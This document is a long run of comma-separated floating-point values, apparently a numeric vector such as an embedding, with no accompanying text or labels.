0.007183527108281851, -0.01751154102385044, 0.01713203452527523, -0.006543108727782965, -0.009677430614829063, -0.014773668721318245, -0.024681514129042625, -0.016278143972158432, -0.012239103205502033, 0.007332618813961744, -0.03786938637495041, 0.018528077751398087, 0.007976425811648369, -0.009067508392035961, 0.002717541763558984, 0.0147058991715312, -0.007996756583452225, -0.015288714319467545, 0.012083234265446663, -0.023000840097665787, 0.009921399876475334, 0.0044117700308561325, 0.018961800262331963, 0.09395511448383331, 0.0016976165352389216, -0.009304700419306755, -0.002216050401329994, -0.008938747458159924, -0.003734078723937273, 0.002426134655252099, -0.009962060488760471, -0.012137449346482754, -0.001547677326016128, 0.01017892174422741, 0.0010851530823856592, 0.016400126740336418, 0.016969388350844383, 0.01341150887310505, 0.006759969983249903, -0.009873961098492146, 0.0012105259811505675, 0.011087028309702873, -0.02022230625152588, 0.0041000316850841045, 0.0033715139143168926, 0.00952833890914917, -0.02390894666314125, 0.020425613969564438, -0.02755492553114891, -0.022675547748804092, -0.017592864111065865, -0.036757972091436386, -0.02026296779513359, 0.005645168013870716, 0.009535115212202072, -0.007515595760196447, -0.004703177139163017, 0.0017433606553822756, 0.0030089491046965122, 0.017796171829104424, -0.015451359562575817, -0.024017376825213432, -0.02160479687154293, 0.005292768590152264, -0.008064525201916695, -0.02686367928981781, -0.0016069753328338265, -0.005065741948783398, -0.02916783094406128, 0.010741406120359898, -0.0180536936968565, -0.01329630147665739, 0.025264328345656395, -0.0014832966262474656, -0.019869906827807426, 0.017931709066033363, 0.006929392926394939, -0.0034477540757507086, 0.0019212545594200492, -0.006119551602751017, -0.030550319701433182, -0.017836833372712135, 0.011866373009979725, 0.0005684135248884559, 0.03239364176988602, -0.01722691021859646, 0.009277592413127422, 0.009074285626411438, 0.00927081611007452, -0.019070230424404144, 0.009474122896790504, -0.008267832919955254, 0.009365692734718323, 0.005025080405175686, 0.006841293070465326, 0.0067159198224544525, 0.008349156007170677, -0.01109380554407835, 0.023786962032318115, -0.013153987005352974, 0.029384691268205643, -0.01073462888598442, -0.03120090439915657, 0.04358910024166107, 0.030658751726150513, -0.013059109449386597, 0.017741955816745758, 0.0017907990841194987, 0.02838170900940895, -0.025928465649485588, -0.018528077751398087, 0.01257117185741663, 0.00536731444299221, -0.027460047975182533, -0.006688812281936407, 0.021021980792284012, 0.004784500226378441, 0.02071024291217327, 0.05318520590662956, 0.009873961098492146, 0.003723913338035345, -0.0059094675816595554, 0.0002462984120938927, 0.013892670162022114, -0.010185698978602886, 0.02156413532793522, 0.005513017997145653, -0.017254019156098366, -0.0016256117960438132, -0.008396593853831291, 0.023055056110024452, -0.011968026868999004, -0.012693156488239765, -0.04760103300213814, -0.008620232343673706, 0.03621581941843033, -0.023692084476351738, -0.012699933722615242, 0.008606678806245327, 0.02287885546684265, -0.007468157447874546, -0.010348345153033733, -0.02174033410847187, -0.009928176179528236, -0.023244809359312057, 0.03667664900422096, -0.010104375891387463, 0.008254279382526875, -0.00202968530356884, -0.004113585688173771, -0.0225264560431242, 0.04236925393342972, 0.005502852611243725, 0.030387673527002335, -0.008640563115477562, 0.0214963648468256, -0.007983202114701271, 0.002910683862864971, -0.04537820443511009, 0.01009759958833456, 0.004374496638774872, -0.022309595718979836, 0.01816212385892868, -0.011656288988888264, 0.008349156007170677, 0.005252107046544552, -0.0027514263056218624, -0.0067159198224544525, 0.00039856715011410415, -0.0078273331746459, -0.00016148110444191843, 0.00237361341714859, 0.008301717229187489, -0.01981569081544876, -0.0268230177462101, 0.0031394045799970627, 0.020791565999388695, -0.0011139549314975739, -0.008640563115477562, 0.026768803596496582, -0.02214694954454899, 0.009304700419306755, -0.01497697550803423, 0.014936314895749092, 0.00835593231022358, 0.014746560715138912, -0.009250485338270664, 0.0005658721784129739, 0.016562772914767265, 0.0026277475990355015, -0.044727619737386703, -0.03309844061732292, -0.016047727316617966, 0.040254857391119, 0.010287352837622166, -0.023190593346953392, 0.019341306760907173, -0.006028063595294952, 0.016793187707662582, 0.004333835560828447, 0.008579570800065994, 0.013350517489016056, -0.0201274286955595, 0.01444837637245655, 0.02198430337011814, 0.01789104752242565, -0.001040256000123918, 0.010985374450683594, -0.03206834942102432, -0.017213357612490654, -0.002219438785687089, -0.039983782917261124, 0.03388456255197525, 0.006136494223028421, 0.03952295333147049, -0.013879116624593735, -0.010287352837622166, -0.022404471412301064, -0.02552185207605362, -0.006759969983249903, -0.019544614478945732, -0.009386023506522179, 0.0037679632660001516, -0.0010749876964837313, -0.016657650470733643, 0.0032969678286463022, 0.010463552549481392, -0.010341567918658257, -0.018663616850972176, 0.012964232824742794, 0.023095717653632164, -0.010727851651608944, 0.005953517276793718, 0.007230965420603752, 0.012794810347259045, 0.000015142163647396956, 0.011541081592440605, -0.0012859191047027707, -0.009148831479251385, -0.017877494916319847, -0.01860940083861351, 0.0030462220311164856, 0.004333835560828447, -0.003845897736027837, 0.023895392194390297, 0.02057470567524433, 0.017525095492601395, -0.012564395554363728, -0.0032529179006814957, 0.03136355057358742, 0.0009335196809843183, -0.0018602623604238033, 0.013540270738303661, -0.01661698892712593, 0.01888047717511654, -0.0018755104392766953, 0.01757930964231491, 0.003022502874955535, -0.02558962069451809, -0.010328014381229877, 0.012476295232772827, -0.005587564315646887, 0.0009987474186345935, 0.015261606313288212, 0.024722175672650337, -0.02122528851032257, -0.004296562168747187, -0.0007242824649438262, -0.00014771550195291638, 0.039224766194820404, -0.006173767149448395, 0.001848402782343328, 0.04020064324140549, -0.02556251361966133, -0.009704538621008396, -0.013594485819339752, -0.012218772433698177, -0.005587564315646887, 0.026958556845784187, -0.024722175672650337, 0.014231516048312187, 0.002178777242079377, -0.009067508392035961, 0.004567638970911503, 0.00583153311163187, 0.0027565089985728264, 0.013973993249237537, -0.016481449827551842, 0.022607779130339622, -0.010951490141451359, -0.0017891047755256295, 0.021103303879499435, -0.010090822353959084, 0.0062483130022883415, 0.004506646655499935, 0.024654407054185867, -0.02878832258284092, 0.018595846369862556, -0.0054554142989218235, 0.00011573695519473404, 0.006946335081011057, 0.009670653380453587, -0.006387239787727594, 0.015261606313288212, 0.050962381064891815, 0.019734367728233337, -0.005665498785674572, -0.008315271697938442, -0.003166512120515108, -0.04667937010526657, -0.005448637530207634, -0.011412319727241993, -0.007203857880085707, -0.0018263778183609247, -0.0076172491535544395, -0.009690984152257442, -0.03326108679175377, 0.007366503588855267, -0.014245069585740566, -0.018907584249973297, 0.01688806526362896, -0.01515317615121603, -0.003737467108294368, 0.026307974010705948, 0.03700194135308266, 0.0010055243037641048, 0.023027947172522545, -0.011642735451459885, -0.0017738568130880594, -0.006268643774092197, 0.01193414255976677, -0.011148020625114441, -0.0034003157634288073, -0.005821367725729942, -0.018622955307364464, -0.0052148341201245785, -0.0008085703593678772, 0.023583654314279556, -0.007481710985302925, 0.0051199570298194885, 0.012720264494419098, -0.0003420222783461213, 0.006532943341881037, -0.008566017262637615, -0.026185989379882812, -0.0381946787238121, -0.03252917900681496, -0.000007676971108594444, 0.0041203624568879604, 0.0044253235682845116, -0.008057748898863792, 0.0065973238088190556, -0.022540010511875153, 0.013797793537378311, 0.01682029664516449, 0.02442399226129055, -0.0060314517468214035, 0.0006959041929803789, -0.005540125537663698, 0.0044219354167580605, -0.003666309406980872, -0.003557879012078047, -0.0001423151552444324, -0.0316346250474453, 0.010924382135272026, -0.009731645695865154, 0.006722697056829929, 0.021279504522681236, 0.019531061872839928, 0.01219166535884142, -0.0017941874684765935, -0.005492687225341797, -0.02600978873670101, -0.01892113871872425, -0.0035714327823370695, -0.011595296673476696, -0.006529554724693298, 0.0007742622401565313, 0.011019259691238403, 0.005604506470263004, -0.012625387869775295, 0.015329375863075256, -0.03353216126561165, -0.00813229475170374, 0.01554623618721962, -0.004238958470523357, 0.00025286353775300086, 0.001209678826853633, -0.014258623123168945, -0.02019519917666912, 0.009433461353182793, -0.0067159198224544525, -0.00047099540825001895, -0.006112774834036827, 0.022024964913725853, -0.019138000905513763, -0.005543514154851437, -0.022729763761162758, 0.0166847575455904, 0.004286396782845259, -0.02243157848715782, -0.03109247237443924, 0.018650062382221222, 0.013282747939229012, -0.0045202006585896015, -0.00969776138663292, -0.006532943341881037, -0.027229633182287216, 0.021902980282902718, -0.020791565999388695, 0.004723507910966873, -0.015261606313288212, 0.018514523282647133, 0.0030462220311164856, 0.017145587131381035, 0.02634863555431366, 0.024844160303473473, 0.012062903493642807, -0.00682773906737566, 0.027636248618364334, 0.005709548480808735, -0.006377074401825666, -0.019219322130084038, 0.022241825237870216, 0.0019365026382729411, -0.008823540061712265, 0.013818124309182167, 0.005540125537663698, 0.017484433948993683, 0.0016925338422879577, -0.03030635230243206, 0.025806481018662453, 0.0034426713827997446, 0.00021940252918284386, -0.0043372237123548985, 0.0008640562882646918, -0.01496342197060585, -0.013872339390218258, -0.002490515122190118, -0.026714587584137917, 0.0014849909348413348, -0.015492021106183529, 0.016603434458374977, 0.011615627445280552, 0.0072580729611217976, -0.032827362418174744, -0.03385745361447334, 0.008403371088206768, -0.012211996130645275, -0.0013672420755028725, -0.0033715139143168926, -0.0012401749845594168, -0.01413663849234581, 0.018650062382221222, 0.02438333071768284, -0.0016620376845821738, -0.021306611597537994, -0.005187726113945246, 0.00563161401078105, -0.020683135837316513, -0.011615627445280552, -0.02087288908660412, 0.0047811116091907024, 0.015275159850716591, -0.010504214093089104, 0.0010978598147630692, -0.002770062768831849, -0.012327203527092934, 0.0023295634891837835, -0.013628370128571987, -0.01592574454843998, 0.0028666339349001646, -0.020696690306067467, 0.0033799849916249514, -0.000029066599381621927, 0.022553563117980957, 0.013323409482836723, -0.016915172338485718, 0.007298734504729509, -0.00854568649083376, 0.001146145281381905, -0.009230154566466808, -0.004415158182382584, -0.0015874917153269053, -0.0026684091426432133, 0.023204147815704346, 0.025088129565119743, 0.006641373969614506, 0.005231776274740696, -0.00479805376380682, 0.004967476706951857, -0.0017162529984489083, -0.0288967527449131, 0.013120101764798164, 0.010965043678879738, 0.007786672096699476, 0.009785860776901245, 0.004679457750171423, -0.018961800262331963, -0.025928465649485588, -0.014800775796175003, -0.0013545353431254625, -0.007054765708744526, 0.007515595760196447, -0.010219583287835121, 0.00202968530356884, 0.015898635610938072, -0.019734367728233337, 0.006099220830947161, -0.01568177528679371, 0.008322048000991344, -0.008159402757883072, 0.0187449399381876, 0.010382229462265968, -0.012618610635399818, 0.00604500574991107, 0.004465985111892223, 0.0030546931084245443, 0.011879927478730679, 0.0014248457737267017, 0.029520230367779732, 0.019151553511619568, 0.007156419102102518, -0.00911494717001915, -0.01968015357851982, -0.0016273059882223606, 0.012957456521689892, 0.006261867005378008, -0.0015586897497996688, -0.010721075348556042, 0.004689623136073351, 0.005743433255702257, -0.011961249634623528, 0.00625170161947608, -0.005628225393593311, -0.0033647369127720594, -0.009053954854607582, 0.013370847329497337, -0.0016806742642074823, -0.02813773974776268, -0.009535115212202072, -0.02384117804467678, 0.0017755510052666068, -0.018704278394579887, 0.01671186462044716, -0.0060077328234910965, -0.014773668721318245, -0.005648556165397167, 0.00965032260864973, 0.01950395293533802, -0.000770026643294841, -0.01747087948024273, 0.0020567928440868855, 0.008864201605319977, 0.01465168409049511, -0.008410148322582245, -0.006112774834036827, 0.00003819954872597009, 0.011439427733421326, 0.019341306760907173, -0.012889686971902847, -0.003032668260857463, -0.0017323482315987349, 0.004452431108802557, -0.020479828119277954, 0.014665237627923489, 0.02393605373799801, -0.000053950574510963634, -0.009250485338270664, -0.0042050741612911224, 0.011981580406427383, -0.0012833777582272887, 0.006604101043194532, 0.007163196336477995, -0.01950395293533802, -0.002992006717249751, 0.003815401578322053, -0.008511802181601524, -0.004245735704898834, 0.00944023858755827, 0.009758753702044487, -0.00918271578848362, 0.0010156896896660328, 0.0038696168921887875, -0.01006371434777975, 0.025684496387839317, 0.00787477195262909, 0.013289525173604488, 0.019138000905513763, -0.007136088330298662, 0.008511802181601524, 0.009731645695865154, -0.005523183383047581, 0.02487126737833023, -0.012801587581634521, 0.011080251075327396, 0.01043644454330206, -0.031553301960229874, 0.008213617838919163, 0.016047727316617966, -0.023163486272096634, -0.01444837637245655, -0.016007065773010254, 0.006377074401825666, 0.0008513496140949428, -0.012706710025668144, 0.004069535993039608, 0.010883720591664314, -0.01234753429889679, 0.013309855945408344, -0.017728403210639954, -0.040092211216688156, -0.018392540514469147, 0.023366793990135193, 0.019531061872839928, -0.028110632672905922, 0.011134467087686062, 0.010612644255161285, -0.01840609312057495, 0.0004233452200423926, -0.01382490061223507, 0.005404587369412184, 0.016386574134230614, -0.010571982711553574, 0.004811607766896486, -0.0064855050295591354, -0.0033291580621153116, 0.014570361003279686, 0.0066922008991241455, 0.027121203020215034, -0.006441454868763685, 0.0070615424774587154, -0.02239091880619526, 0.0031343218870460987, 0.000921660044696182, 0.001946668024174869, 0.0147058991715312, 0.008850647136569023, -0.022228272631764412, -0.004689623136073351, 0.019802138209342957, -0.014936314895749092, -0.04158313199877739, 0.006993773393332958, 0.018663616850972176, -0.029709983617067337, 0.0029598164837807417, 0.00281241862103343, 0.002471878658980131, 0.0175386480987072, -0.020235860720276833, -0.003723913338035345, 0.001916171982884407, 0.0147058991715312, 0.020317181944847107, -0.015586897730827332, 0.009975614957511425, -0.009569000452756882, 0.01706426404416561, -0.008735439740121365, -0.002514234511181712, 0.00002262059206259437, -0.02675524912774563, -0.010924382135272026, -0.024979697540402412, -0.013492831960320473, -0.005472356453537941, -0.014204408042132854, 0.00573665602132678, 0.021482812240719795, 0.00032677422859705985, -0.02741938643157482, 0.008999739773571491, 0.0037103593349456787, 0.010822729207575321, 0.00745460344478488, 0.0059094675816595554, 0.0017230298835784197, -0.015275159850716591, 0.014285731129348278, 0.011114136315882206, 0.016766080632805824, 0.004940369166433811, 0.027744678780436516, 0.027785340324044228, -0.0020567928440868855, 0.0057807061821222305, 0.026335081085562706, 0.02104908972978592, 0.0025684498250484467, -0.0008166179177351296, 0.02748715505003929, -0.006624431814998388, -0.020696690306067467, -0.006651539355516434, -0.010863389819860458, -0.005479133687913418, -0.013696139678359032, -0.010138260200619698, 0.003950939979404211, 0.0018822873244062066, -0.018582293763756752, -0.017037156969308853, 0.012225549668073654, -0.009514784440398216, 0.00786121841520071, -0.005980624817311764, -0.0035443250089883804, -0.013804569840431213, -0.00908106192946434, -0.011486866511404514, -0.0005417294451035559, -0.02080512046813965, 0.01572243683040142, 0.0018619566690176725, 0.011391988955438137, 0.012151003815233707, -0.0016467897221446037, -0.03019792027771473, -0.014041761867702007, 0.01878560148179531, 0.009616438299417496, 0.01458391547203064, 0.024979697540402412, -0.01981569081544876, 0.010151814669370651, 0.014611022546887398, 0.005248718429356813, 0.00901329331099987, -0.0064855050295591354, 0.003937385976314545, 0.027920877560973167, -0.0010749876964837313, 0.014312838204205036, -0.00573665602132678, -0.0006404182058759034, 0.006492281798273325, -0.005180949345231056, 0.017972370609641075, -0.007203857880085707, -0.020100321620702744, 0.02480349875986576, -0.007007327396422625, -0.009928176179528236, 0.014258623123168945, 0.01288290973752737, -0.0002507457393221557, 0.010402560234069824, 0.0264841727912426, -0.01497697550803423, -0.02538631297647953, -0.015627559274435043, -0.008505024947226048, 0.015871528536081314, 0.005743433255702257, 0.021347273141145706, 0.009480900131165981, -0.000027160593162989244, -0.035890527069568634, 0.004147470463067293, -0.005126734264194965, -0.004235570318996906, -0.02077801339328289, 0.03616160526871681, -0.004821773152798414, -0.012333979830145836, -0.016603434458374977, 0.014461930841207504, 0.027229633182287216, 0.0023244807962328196, 0.008071302436292171, -0.024261346086859703, 0.01943618431687355, 0.007373280357569456, 0.010070491582155228, -0.015966404229402542, -0.000627287954557687, 0.011947696097195148, -0.022607779130339622, -0.0022516290191560984, -0.005221610888838768, -0.0007179291569627821, -0.02239091880619526, 0.005614671856164932, 0.009690984152257442, 0.014719453640282154, 0.035619448870420456, -0.0035206058528274298, 0.0058891368098556995, 0.0002687469241209328, -0.03643267974257469, -0.003027585567906499, 0.005123345647007227, -0.00020510748436208814, 0.0047607808373868465, 0.015627559274435043, -0.024654407054185867, 0.004784500226378441, -0.01490920688956976, 0.014868545345962048, -0.019287092611193657, -0.005946740508079529, -0.0007585905841551721, 0.021279504522681236, 0.00338845606893301, -0.01812146231532097, -0.0002539224224165082, 0.03092982806265354, 0.00427284324541688, 0.002039850689470768, 0.013099770992994308, 0.0010876944288611412, -0.02111685834825039, 0.0003975082654505968, -0.0051064034923911095, 0.006143270991742611, 0.010409337468445301, 0.006966665852814913, -0.01516672968864441, -0.012767702341079712, 0.005977236665785313, 0.010910828597843647, -0.01234753429889679, -0.011771496385335922, -0.032691825181245804, -0.007203857880085707, -0.0026345246005803347, 0.020886443555355072, 0.0037408554926514626, 0.002141504315659404, -0.00552996015176177, 0.011032813228666782, -0.007325842045247555, -0.022716209292411804, 0.008403371088206768, -0.03120090439915657, 0.009772307239472866, 0.005014915019273758, -0.0018009644700214267, -0.02084578201174736, 0.01603417471051216, 0.014990529976785183, -0.0015180283226072788, 0.020818674936890602, -0.01463813055306673, 0.0028530799318104982, -0.018514523282647133, -0.00990784540772438, -0.0087693240493536, 0.020764458924531937, -0.014299284666776657, 0.0073868343606591225, -0.0005184338078834116, 0.004042427986860275, -0.003476555924862623, 0.008789654821157455, -0.019856352359056473, -0.019314199686050415, 0.006295751314610243, 0.008410148322582245, -0.016359465196728706, -0.02775823324918747, 0.020046105608344078, -0.014570361003279686, -0.0070615424774587154, 0.022892409935593605, 0.0046862349845469, 0.005607894621789455, -0.010070491582155228, -0.013696139678359032, -0.01119545940309763, -0.013431839644908905, -0.02274331822991371, -0.005760375410318375, 0.011622404679656029, 0.0042050741612911224, 0.025291435420513153, 0.029438907280564308, -0.018446754664182663, 0.007956095039844513, -0.022363809868693352, -0.010287352837622166, -0.0023244807962328196, -0.004821773152798414, 0.013445394113659859, 0.037435662001371384, -0.039062123745679855, -0.004676069598644972, -0.011554635129868984, -0.03212256357073784, -0.008742216974496841, -0.003608705708757043, 0.006902284920215607, -0.0065939356572926044, 0.014814330264925957, -0.0017162529984489083, 0.011066697537899017, -0.008240724913775921, -0.01657632738351822, -0.0031902315095067024, -0.02211984060704708, -0.014665237627923489, 0.010124706663191319, 0.009101392701268196, -0.00969776138663292, -0.009230154566466808, -0.013194647617638111, -0.01406886987388134, -0.011703727766871452, 0.011330997571349144, 0.008261055685579777, -0.016156159341335297, -0.016427235677838326, 0.0012613527942448854, 0.0071496423333883286, -0.0213337205350399, 0.03244785591959953, 0.02153702639043331, -0.008139071986079216, -0.0026548553723841906, -0.009562223218381405, 0.014949868433177471, 0.008986185304820538, 0.005136899650096893, -0.021198181435465813, 0.003403704147785902, 0.041881319135427475, -0.003402009839192033, 0.01341150887310505, 0.009745200164616108, 0.005496075842529535, -0.008179732598364353, 0.013262417167425156, 0.0027514263056218624, 0.015207391232252121, -0.012991340830922127, 0.012096788734197617, 0.00969776138663292, -0.0015104042831808329, -0.0132420863956213, -0.01568177528679371, -0.018284108489751816, 0.0182298943400383, 0.027460047975182533, 0.01307266391813755, -0.003093660343438387, -0.001899229595437646, -0.0042084623128175735, -0.011534304358065128, -0.0023312577977776527, 0.0010902357753366232, -0.004062758758664131, 0.010056938044726849, -0.007095427252352238, 0.01715914160013199, -0.007115758024156094, 0.018392540514469147, -0.04554085060954094, -0.0013528411509469151, 0.001143603934906423, -0.013438616879284382, -0.01878560148179531, -0.019002461805939674, -0.0035409366246312857, -0.0018043528543785214, 0.013770685531198978, -0.027500709518790245, 0.0023820847272872925, -0.006892119534313679, 0.0043033394031226635, 0.0014883793191984296, 0.005699383094906807, 0.0070276581682264805, -0.009399577043950558, 0.0033799849916249514, -0.006749804597347975, -0.0023498942609876394, -0.01413663849234581, 0.010056938044726849, -0.009711314924061298, 0.0014629659708589315, 0.021198181435465813, -0.04361620545387268, -0.015573344193398952, -0.022933071479201317, 0.021279504522681236, -0.011995134875178337, 0.006400793790817261, -0.0022279098629951477, -0.007942541502416134, -0.015315821394324303, -0.01214422658085823, -0.008179732598364353, -0.028056416660547256, -0.019409077242016792, 0.028978075832128525, -0.018514523282647133, -0.016020620241761208, 0.006292363163083792, 0.0018721219385042787, -0.02487126737833023, -0.00803064089268446, -0.023027947172522545, 0.008376263082027435, -0.00796287227421999, -0.024749282747507095, -0.007549480069428682, -0.01740311086177826, 0.00002893423879868351, 0.012564395554363728, -0.0027310955338180065, 0.005865417420864105, -0.00301911449059844, -0.000031740302802063525, -0.01847386173903942, -0.013011671602725983, 0.0037679632660001516, 0.01231364905834198, -0.0007937458576634526, -0.01124967448413372, 0.008586348034441471, 0.0019483622163534164, -0.016074836254119873, -0.015830866992473602, -0.001595962792634964, -0.010727851651608944, 0.0033410177566111088, -0.026809465140104294, 0.0042050741612911224, -0.0037442438770085573, 0.01692872680723667, -0.01334374025464058, -0.005709548480808735, 0.01489565335214138, 0.028571462258696556, -0.0035206058528274298, -0.0062245940789580345, 0.015614005737006664, -0.0011503808200359344, -0.008532132022082806, 0.019178662449121475, -0.002514234511181712, -0.010246691294014454, 0.0033189926762133837, 0.018013032153248787, -0.008660893887281418, -0.03323397785425186, -0.015044745057821274, -0.0055536795407533646, -0.00504879979416728, -0.03006238304078579, -0.012706710025668144, 0.012137449346482754, 0.02469506859779358, -0.011486866511404514, -0.009914622642099857, 0.004072924144566059, 0.02066958136856556, -0.00039729647687636316, -0.007136088330298662, -0.006011120975017548, 0.003557879012078047, 0.019869906827807426, 0.002897129859775305, -0.002651466988027096, -0.035998959094285965, 0.03654111176729202, 0.000323809334076941, 0.008816762827336788, -0.0037442438770085573, 0.012164557352662086, 0.017321787774562836, 0.0007200469262897968, -0.022512901574373245, 0.0019365026382729411, -0.015695327892899513, -0.025399867445230484, -0.006773523520678282, -0.006668481510132551, 0.034209851175546646, -0.002244852250441909, -0.02091355063021183, -0.0013672420755028725, 0.0017340424237772822, -0.021577687934041023, -0.0014146803878247738, -0.009345361962914467, 0.01099215168505907, -0.0030529990326613188, -0.040634363889694214, -0.01995122991502285, -0.027500709518790245, 0.027229633182287216, -0.0020737352315336466, 0.018257001414895058, -0.016982942819595337, 0.000502338632941246, 0.011466535739600658, -0.006221205461770296, 0.015505575574934483, -0.005150453187525272, 0.009962060488760471, -0.010856613516807556, -0.03019792027771473, -0.007935764268040657, 0.0017941874684765935, 0.012408526614308357, 0.0022363809403032064, 0.018189232796430588, -0.004496481269598007, 0.002883576089516282, 0.027148310095071793, 0.01984279975295067, -0.013716470450162888, 0.0018941470189020038, 0.006739639211446047, 0.005435083527117968, -0.0007128464640118182, -0.002270265482366085, 0.0021550580859184265, 0.021076196804642677, 0.00021188439859542996, -0.009243708103895187, -0.010307683609426022, -0.002717541763558984, 0.00651938933879137, 0.015112514607608318, -0.006190709304064512, 0.01554623618721962, -0.0049878074787557125, 0.01671186462044716, -0.005648556165397167, -0.015085406601428986, -0.015044745057821274, 0.008979409001767635, -0.020181644707918167, -0.015939297154545784, -0.012523734010756016, -0.016833849251270294, -0.0026497726794332266, -0.01100570522248745, 0.0005734962178394198, -0.03195991739630699, 0.00828816369175911, -0.01802658662199974, 0.015898635610938072, -0.005560456309467554, -0.01603417471051216, -0.004391439259052277, 0.003950939979404211, -0.011019259691238403, 0.03277314826846123, -0.03326108679175377, -0.00013596180360764265, -0.027094094082713127, -0.009467346593737602, 0.030767181888222694, 0.0014239986194297671, -0.0008187356870621443, 0.016481449827551842, -0.023312577977776527, -0.018284108489751816, -0.004567638970911503, 0.010456775315105915, -0.0011071780463680625, -0.016969388350844383, -0.0011020953534170985, -0.017863940447568893, 0.00813229475170374, 0.022919517010450363, -0.013106548227369785, -0.012130673043429852, -0.0049979728646576405, -0.02263488620519638, 0.01152075082063675, -0.0012808364117518067, -0.004693011753261089, -0.010795621201395988, 0.008999739773571491, -0.014258623123168945, -0.01147331204265356, 0.026321526616811752, -0.004032262600958347, -0.00010419502359582111, 0.0214963648468256, 0.01413663849234581, 0.006190709304064512, -0.0021584464702755213, -0.01241530291736126, -0.005113180261105299, -0.0000570743068237789, -0.020059660077095032, -0.000012316243555687834, -0.005590952467173338, -0.0024837383534759283, -0.012530510313808918, 0.018663616850972176, 0.01463813055306673, 0.01100570522248745, -0.012327203527092934, 0.01025346852838993, -0.014204408042132854, -0.001108025200664997, -0.0008750687702558935, -0.0294117983430624, -0.0030411393381655216, -0.00007216352241812274, 0.00028992476291023195, -0.006580381654202938, 0.005767152179032564, -0.0023854731116443872, 0.013987546786665916, 0.03326108679175377, -0.015505575574934483, -0.015139621682465076, -0.008254279382526875, 0.01497697550803423, 0.007834110409021378, -0.010002722032368183, -0.008572793565690517, -0.0065973238088190556, 0.027812447398900986, 0.0012037489796057343, -0.0012715181801468134, -0.02518300525844097, -0.014028208330273628, -0.00603822898119688, -0.029330475255846977, 0.008837093599140644, 0.0048048305325210094, 0.013113325461745262, 0.002441382734104991, -0.00044304062612354755, 0.013059109449386597, 0.0026802688371390104, -0.003002172103151679, 0.013628370128571987, -0.00042863970156759024, 0.0023668366484344006, 0.00958255399018526, -0.004381273873150349, -0.006285585928708315, -0.00796287227421999, -0.002280430868268013, -0.016210373491048813, 0.003136016195639968, -0.004299950785934925, 0.002522705588489771, -0.01836543157696724, -0.0017670798115432262, -0.012706710025668144, 0.02469506859779358, 0.023366793990135193, 0.005926409736275673, -0.015614005737006664, -0.0070615424774587154, 0.020005444064736366, 0.013831677846610546, 0.011364881880581379, 0.008308494463562965, 0.0066650933586061, 0.006075501907616854, -0.002107619773596525, 0.019910568371415138, -0.018772047013044357, -0.013235309161245823, -0.025332096964120865, 0.006973442621529102, 0.00036023525171913207, 0.004855657462030649, 0.014882098883390427, -0.002764980075880885, 0.012598279863595963, 0.004533754196017981, -0.003212256357073784, -0.01167661976069212, -0.020168090239167213, -0.004130527842789888, 0.00016148110444191843, 0.0201274286955595, 0.0011122607393190265, 0.004276231396943331, 0.010944712907075882, -0.020940659567713737, -0.00010101834777742624, 0.011954473331570625, -0.008301717229187489, 0.004133916459977627, 0.010653305798768997, 0.007867994718253613, 0.002910683862864971, 0.0030258912593126297, -0.011818935163319111, 0.0023193981032818556, 0.01860940083861351, 0.01775551028549671, -0.0036425902508199215, 0.010707520879805088, -0.00942668505012989, 0.0014799082418903708, 0.016766080632805824, -0.012252657674252987, -0.0004121209785807878, -0.013106548227369785, -0.0061059980653226376, -0.015424252487719059, -0.017254019156098366, -0.00447953911498189, -0.008254279382526875, -0.0009606272797100246, -0.0206424742937088, 0.0010902357753366232, -0.005797648336738348, 0.003186842892318964, 0.028598569333553314, 0.011649511754512787, 0.018040141090750694, -0.016901619732379913, 0.022404471412301064, 0.0038797822780907154, -0.012035796418786049, -0.00017016402853187174, -0.02039850503206253, -0.011635958217084408, 0.019083784893155098, -0.03144487366080284, -0.016833849251270294, 0.007407165132462978, 0.013438616879284382, 0.005407975986599922, 0.030740072950720787, -0.027270294725894928, 0.025169452652335167, -0.01406886987388134, 0.013601263053715229, 0.011839265935122967, -0.020452721044421196, 0.026199541985988617, -0.0004688776098191738, 0.00811874121427536, -0.005482521839439869, 0.02927626110613346, -0.0269992183893919, 0.0004214392392896116, 0.01033479068428278, 0.019246431067585945, 0.0045439195819199085, 0.011669842526316643, 0.04489026591181755, -0.014217961579561234, -0.024071592837572098, -0.025088129565119743, -0.00599417882040143, 0.01401465479284525, 0.004106808919459581, 0.02283819392323494, -0.007142865564674139, 0.006654927972704172, 0.02359720878303051, 0.00027488850173540413, -0.004147470463067293, 0.0035849865525960922, 0.017077818512916565, 0.004299950785934925, -0.03147197887301445, 0.01568177528679371, 0.0031444872729480267, -0.008362709544599056, 0.008233948610723019, -0.0004748073988594115, 0.022661995142698288, -0.008003532886505127, 0.011053144000470638, -0.011242897249758244, 0.003203785279765725, -0.0016654261853545904, -0.034589361399412155, -0.011757942847907543, 0.009989168494939804, 0.0012156086741015315, 0.021103303879499435, -0.01740311086177826, -0.01827055588364601, 0.0022008023224771023, 0.018907584249973297, -0.006177155300974846, -0.013255639933049679, -0.008782878518104553, -0.012584726326167583, 0.0052385530434548855, -0.0006870094803161919, 0.012374641373753548, 0.03225810080766678, 0.013682586140930653, 0.002519317204132676, -0.0185687392950058, -0.031797271221876144, 0.003984824288636446, 0.019341306760907173, 0.007380057591944933, -0.02071024291217327, 0.010558429174125195, -0.007535926532000303, 0.01726757176220417, 0.02029007486999035, -0.019043123349547386, -0.002832749392837286, 0.02449176087975502, -0.005685829557478428, -0.026429956778883934, -0.009548669680953026, 0.008816762827336788, 0.02628086507320404, 0.0039780475199222565, -0.024017376825213432, 0.006448232103139162, 0.008559240028262138, -0.003105520037934184, 0.002209273399785161, -0.006637985352426767, 0.03017081320285797, -0.020899998024106026, -0.004713342525064945, 0.00868800189346075, -0.004164412617683411, -0.01791815645992756, 0.012950679287314415, -0.008464363403618336, -0.005967071279883385, 0.0009648628765717149, 0.005370703060179949, 0.01923287659883499, 0.017362449318170547, 0.021509919315576553, 0.0108362827450037, 0.0280293095856905, -0.03315265476703644, -0.001916171982884407, 0.010707520879805088, -0.0014688957016915083, -0.0012698238715529442, -0.02679591067135334, -0.02903229184448719, 0.012896464206278324, 0.014299284666776657, 0.017010049894452095, 0.0022617944050580263, 0.01157496590167284, 0.007020880933851004, -0.014353499747812748, -0.008376263082027435, -0.002239769557490945, 0.00033291580621153116, -0.017213357612490654, 0.0025396477431058884, -0.01568177528679371, 0.00657021626830101, -0.018351878970861435, 0.015248052775859833, -0.018487416207790375, 0.010761736892163754, 0.013357293792068958, -0.009690984152257442, -0.008376263082027435, -0.0036595326382666826, -0.005916244350373745, 0.0009479206055402756, -0.016942281275987625, -0.02308216318488121, -0.00417796615511179, -0.02610466629266739, -0.014353499747812748, 